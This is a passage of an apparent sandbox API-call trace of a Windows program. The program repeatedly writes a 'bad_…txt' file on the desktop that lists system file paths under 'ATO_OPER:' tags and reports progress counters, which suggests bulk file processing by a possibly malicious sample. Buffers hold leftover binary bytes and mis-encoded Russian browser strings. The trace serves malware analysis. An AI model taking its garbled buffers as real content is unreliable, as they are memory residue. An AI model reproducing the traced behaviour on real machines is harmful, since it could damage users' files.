C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\n", cchWideChar=552, lpMultiByteStr=0x1f25a38, cbMultiByte=552, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\n®B`\x82.", lpUsedDefaultChar=0x0) returned 552 [0156.155] WriteFile (in: hFile=0x1d8, lpBuffer=0x1f25a38*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesWritten=0x2a1fe34*=0x228, lpOverlapped=0x0) returned 1 [0156.156] CloseHandle (hObject=0x1d8) returned 1 [0156.157] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2558 / B=8 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0156.157] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2558 / B=8 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2558 / B=8 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0156.157] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0156.160] Sleep (dwMilliseconds=0x5dc) [0158.882] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2595 / B=8 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0158.882] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2595 / B=8 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2595 / B=8 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0158.882] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0158.884] Sleep (dwMilliseconds=0x5dc) [0161.708] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2678 / B=8 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0161.708] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2678 / B=8 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2678 / B=8 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0161.708] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0161.710] Sleep (dwMilliseconds=0x5dc) [0163.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0164.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n", cchWideChar=616, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 616 [0164.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n", cchWideChar=616, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 616 [0164.166] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n", cchWideChar=616, lpMultiByteStr=0x2663858, cbMultiByte=616, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\n5[\x95rÖp\x93ýîP j¶\x97«\x80Õ_8c\x07x_xÚ¥êbÛ_m\x9fR&³xÒ÷Âþß}\x14¦V»?[¥\x0e£Z\x9aх\x96Ý. ýð$/xº×nC¯\x86vg\x84÷\x8e\x06<'çü¨\x08ä=\x01\x97N³\x09ã\x88³øuþù³\x9e­\x86ˬZN\x95\x0b}Ç\x9aÏÔ\x8frés\x12| t}&l\x05!W\x8aß\x80\x12ðI\x9e%\nJÂ\x18\x0ct§ºÌÊ\x93*Ùzcßpo\\Ì¥X\x95ë\x0b\x8f\x93\x93íLHuKY\x1cUå;F\x86`rÈÒÎMû@\x94TaU\\Ï×ôg½fÕ¡\r²GÄ,\x01n\"î[>·ÆHd5áËxOñØ+zõIZØ\x0bÖ}¿RO\x94ø\x8bá\x9b\x80\x84)=¢GQOÀ÷ê\x01\x05\x1d7æð\x16\x80ì¾É§OÁ¡eP¸þÒÙø\x061ÄM%§\x84\x03\x10\x1aÜuö\x19d¢~M\x90ƪÎV\x8fº?è5\r\x15¹Vub\x08ý¢\x9f½ý\x84\x89\x0b¸°´(ÜåøvZ\x86¤A\x92ÿ¼ìË3\x86\x84Nc\rQèÀ7\x18MÞiï\nÝ0láÚ{hûÁ\x09ݬ^ÑáïÜ_j\x7f¥òGÚ<ø\x86í\x13\x8bg¬Ü;S \x87¢E°Êh7>\x0bZ\x8eA?Øq\x91\\\x11öXyÆ\x9b¿§Ì-+è\x1b²\x10[C³\x95á¤(\x98Ò\x124áÈjv× 5§ì\x12^ÏYä±³óÒj²ü&±/1;\x16\x12hq$GÔ\x1ej\x99-»K\x10û\x96sÃ:å\\ãDZ\x18Ñ.¡6÷y¢E×\x8d\x8bÀw6»ûxR¨×/\x93ãØ\x0fÈ+úw\x8b[¨;\x0eÛð\x01tNô¡V8»Ê\x06J³\x1e(SæÒ4S\x10ã[\x99\x80ü$øä£ëO\x80 \x1díê¬b*´©¢HÓ(\x94\x0b1Ýfk;º]&¦î \x1c)é¯\x9eD\r¿ÚÓ\x8e¿\x86þp\x87òC\x8eë\x8e+ÛÖ\x83\x91ý\x9eb1\x9cc4\x1c\x9e%\x10?|ú\x07¿5ï\x0b`\x0cíFyØÙ\\\x8f̧\"+M\x8bqEóÌ£%7\x8c\x10ü\x86L.µÂ \x14V[r³2\x95hòN\x82¬µi\x982\x18=&YÑÄÓ,Ü\x89Ó\x88\x0b\nö\x06ÂÒ¿Àc\x8e¹<-SZI\x13}\x11\x08wöyoÈ!nH/\x87`6j#A(>¡Ù\x05`µj°%Ë-´{%>î!_û´\x9e×Ò\x80µÉȤÁø[á\x1a\x9en@}¸ºds¾õm\x88\x89\"×ì` …\x01\x1cIè¾a¬Ø¨ä\x9d8\x14àÑ~\x7fÏ·\x1eMfhF\x03¨xB¢\rtoÒó±¹\x97ÙP~±Pf\x81pEÅ\x8bu^\x98\x05XÙA\x8eµ\x19µ\x06DTȸó\r Íf¨\r²Ä^-ÁPÎ?\x88CúV¼äÄ$å³\x9c\x91W\x01¢²Ë\x99{\x03[ê\x15\x8c¹uÚÜ­5·S\x8dç|\x8c¿\x14\x0bØ\x09+ñÍ\x8cì\x83\x18ö/\x8fe§\x0eÙdX(ø±\x82üy\x11C\x98%P§\x8a\x9f\x02\x97Þm°°glp\x01\x06PfaìMǵ:\x96}È\x9d\x0b\x89´\x16\x93\x94;92i\x02á\x03üµhÅ6¢8n#®ªÌÁ¨×Q{\x06Y4ܬÒ_ÿ¨LEËRÃ\x0eÝ7t´Ø\x1e\x05\x02§*½ÎQKô§³\x10iÌÉkð\x08\x13\x97㵦Eö(~HW\x17âF\x19\x99\x8f\x17\x10\x0c\x14÷Ý©\x99ù\x8c~aïÝ\x99)Qyù\x9c\x88Zó9ÎRÏ\x05ü)\x83+\x1fò\x10ÉNÛìäÝeµ\x0b·ÐÒÚ\x07\x02îý\x96\x89\x01~Û^\rì¡È\x0eϺCܺ\x13\x8eKíµyø\x03M\x81Kð\x9cùt\x0b\x96Ì#.·{\x05E»þôYë^zO\x8ax|?;\x95_\x0bLü¬\x17ÁBzÞÕNäà©Ô¿(~\x81þâví$Ão\x9dÍóü, Īó\x81ùÃjïÁø*E\x03ÆN\"½ë\x1aÙÙ¢sàÙý,\x8a6¿ù8Cj\n\x17Ë\x1fW\x80¾Oáà\x08\x8dì\x86Ä\x8eK\x8fÞ!\x11{\x03d}3ðÙ\x1e\x9fÐ 5\x11\"Îý¼\x09ý\x0c!\x17\x9a¹ÂQ½ªÈ\x84:­m¸VG\x9dØ\x9c\x0ejm\x9eu;Ä\x8dª\x1c\x15üÎ\x14IëÛk.Sûò-ø®3\x9f}®Ó\x0e_»\x16æÉ\x0fÿx\x8d\x08w÷\x8dà÷eçÑ[{ª¬\x1bÏ>ü}=®\x86Òå_BB\x1dÄé\x0f\x18ÀYYü\x9c2%å\x04M\x17 @Op.C}ÐòżĪ\x1eÙY\x9c\x89h\x82Wz¾N\x84\x89qÿ´\x14~9*¯ë.\x84,Q@\x169jtÆ\x94nè\x8dsÅM\x8d_\x91úâ]\x92¢NÃnHÕ¦\x1e\x8f\x11|_}\x12ÅÏ ²6­!c/¦wðÄ%k\x1e¸Ï6­7¨&\x9e|kòT4\x97Á¼Æ$ó¸`\"\x9cD¸°\x02Ñ|ú»æW\x86â5øçL\x8f\x1cýE1nPær)\x14\x18µ<1/¹-Â*åJÿ", lpUsedDefaultChar=0x0) returned 616 [0164.166] WriteFile (in: hFile=0x130, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2a1fe34*=0x268, lpOverlapped=0x0) returned 1 [0164.424] CloseHandle (hObject=0x130) returned 1 [0164.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2758 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0164.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2758 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2758 / B=9 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0164.425] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0164.426] Sleep (dwMilliseconds=0x5dc) [0165.936] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2851 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0165.936] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2851 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2851 / B=9 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0165.936] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0165.937] Sleep (dwMilliseconds=0x5dc) [0168.089] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2930 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0168.089] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2930 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2930 / B=9 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0168.089] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0168.090] Sleep (dwMilliseconds=0x5dc) [0170.033] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2974 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0170.033] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=2974 / B=9 / T=3858", cchWideChar=38, lpMultiByteStr=0x1fa54dc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=2974 / B=9 / T=3858", lpUsedDefaultChar=0x0) returned 38 [0170.033] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x26, lpOverlapped=0x0) returned 1 [0170.034] Sleep (dwMilliseconds=0x5dc) [0171.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0171.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n", cchWideChar=668, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 668 [0171.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n", cchWideChar=668, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 668 [0171.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n", cchWideChar=668, lpMultiByteStr=0x2893a98, cbMultiByte=668, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\n\n },\r\n \"1636686747687494376\": {\r\n \"message\": \"Ð\x9eÑ\x82лиÑ\x87ное\"\r\n },\r\n \"1779193092441017833\": {\r\n \"message\": \"Ð\x9fлавное движение (беÑ\x82а)\"\r\n },\r\n \"1802762746589457177\": {\r\n \"message\": \"Ð\x93Ñ\x80омкоÑ\x81Ñ\x82Ñ\x8c\"\r\n },\r\n \"2145752429973207616\": {\r\n \"message\": \"Ð\x94ополниÑ\x82елÑ\x8cнÑ\x8bе Ñ\x81ведениÑ\x8f$START_SPAN$*$END_SPAN$\",\r\n \"placeholders\": {\r\n \"END_SPAN\": {\r\n \"content\": \"$1\"\r\n },\r\n \"START_SPAN\": {\r\n \"content\": \"$2\"\r\n }\r\n }\r\n },\r\n \"2145752429973207616_ph\": {\r\n \"message\": \"\\u003C/span>î\x80\x80\\u003Cspan class=\\\"required-message\\\" ng-show=\\\"!top.sufficientFeedback\\\">\"\r\n },\r\n \"2159130950882492111\": {\r\n \"message\": \"Ð\x9eÑ\x82мена\"\r\n },\r\n \"2194670894476780934\": {\r\n \"message\": \"Ð\x9dеÑ\x82 даннÑ\x8bх\"\r\n },\r\n \"2297080986956220930\": {\r\n \"message\": \"{PARTICIPANTS,plural,offset:1 =0{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а}=1{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а: {ORGANIZER}}=2{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а: {ORGANIZER} и еÑ\x89Ñ\x91 1 Ñ\x83Ñ\x87аÑ\x81Ñ\x82ник}one{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а: {ORGANIZER} и еÑ\x89Ñ\x91 # Ñ\x83Ñ\x87аÑ\x81Ñ\x82ник}few{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а: {ORGANIZER} и еÑ\x89Ñ\x91 # Ñ\x83Ñ\x87аÑ\x81Ñ\x82ника}many{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а: {ORGANIZER} и еÑ\x89Ñ\x91 # Ñ\x83Ñ\x87аÑ\x81Ñ\x82ников}other{Ð\x92идеовÑ\x81Ñ\x82Ñ\x80еÑ\x87а: {ORGANIZER} и еÑ\x89Ñ\x91 # Ñ\x83Ñ\x87аÑ\x81Ñ\x82ника}}\"\r\n },\r\n \"244647017322945605\": {\r\n \"message\": \"ХоÑ\x80оÑ\x88ее â\x80\x93 DVD\"\r\n },\r\n \"2575016469622936324\": {\r\n \"message\": \"Ð\x9aаÑ\x87еÑ\x81Ñ\x82во Ñ\x82Ñ\x80анÑ\x81лÑ\x8fÑ\x86ии Ñ\x81 компÑ\x8cÑ\x8eÑ\x82еÑ\x80а\"\r\n },\r\n \"2807800733729323332\": {\r\n \"message\": \"Ð\x94а\"\r\n },\r\n \"2810417817914017289\": {\r\n \"message\": \"Ð\x92оÑ\x81пÑ\x80оизвеÑ\x81Ñ\x82и\"\r\n },\r\n \"3219866268410307919\": {\r\n \"message\": \"Ð\x9eÑ\x82пÑ\x80авка оÑ\x82зÑ\x8bва...\"\r\n },\r\n \"3239956785410157548\": {\r\n \"message\": \"Ð\x9cой оÑ\x82веÑ\x82\"\r\n },\r\n \"3254351313955764967\": {\r\n \"message\": \"Ð\x9fÑ\x80оизоÑ\x88ла оÑ\x88ибка. Ð\x9fовÑ\x82оÑ\x80иÑ\x82е попÑ\x8bÑ\x82кÑ\x83 Ñ\x87еÑ\x80ез неÑ\x81колÑ\x8cко минÑ\x83Ñ\x82.\"\r\n },\r\n \"3326722026796849289\": {\r\n \"message\": \"Ð\x94Ñ\x80Ñ\x83гое\"\r\n },\r\n \"3370655049908001660\": {\r\n \"message\": \"Ð\x92Ñ\x8b видиÑ\x82е Ñ\x81вое Ñ\x83Ñ\x81Ñ\x82Ñ\x80ойÑ\x81Ñ\x82во Chromecast во вÑ\x80емÑ\x8f $START_LINK$наÑ\x81Ñ\x82Ñ\x80ойки$END_LINK$?$START_SPAN$*$END_SPAN$\",\r\n \"placeholders\": {\r\n \"END_LINK\": {\r\n \"content\": \"$1\"\r\n },\r\n \"END_SPAN\": {\r\n \"content\": \"$2\"\r\n },\r\n \"START_LINK\": {\r\n \"content\": \"$3\"\r\n },\r\n \"START_SPAN\": {\r\n \"content\": \"$4\"\r\n }\r\n }\r\n },\r\n \"3370655049908001660_ph\": {\r\n \"message\": \"\\u003C/a>î\x80\x80\\u003C/span>î\x80\x80\\u003Ca href=\\\"cast_setup/setup.html\\\" target=\\\"_blank\\\">î\x80\x80\\u003Cspan class=\\\"required-message\\\" ng-show=\\\"!top.sufficientFeedback\\\">\"\r\n },\r\n \"3413021810593924462\": {\r\n \"message\": \"Ð\x9fÑ\x80иоÑ\x81Ñ\x82ановиÑ\x82Ñ\x8c\"\r\n },\r\n \"3485206350043289145\": {\r\n \"message\": \"Ð\x9fеÑ\x80езапÑ\x83Ñ\x81Ñ\x82иÑ\x82е бÑ\x80аÑ\x83зеÑ\x80 Chrome.\"\r\n },\r\n 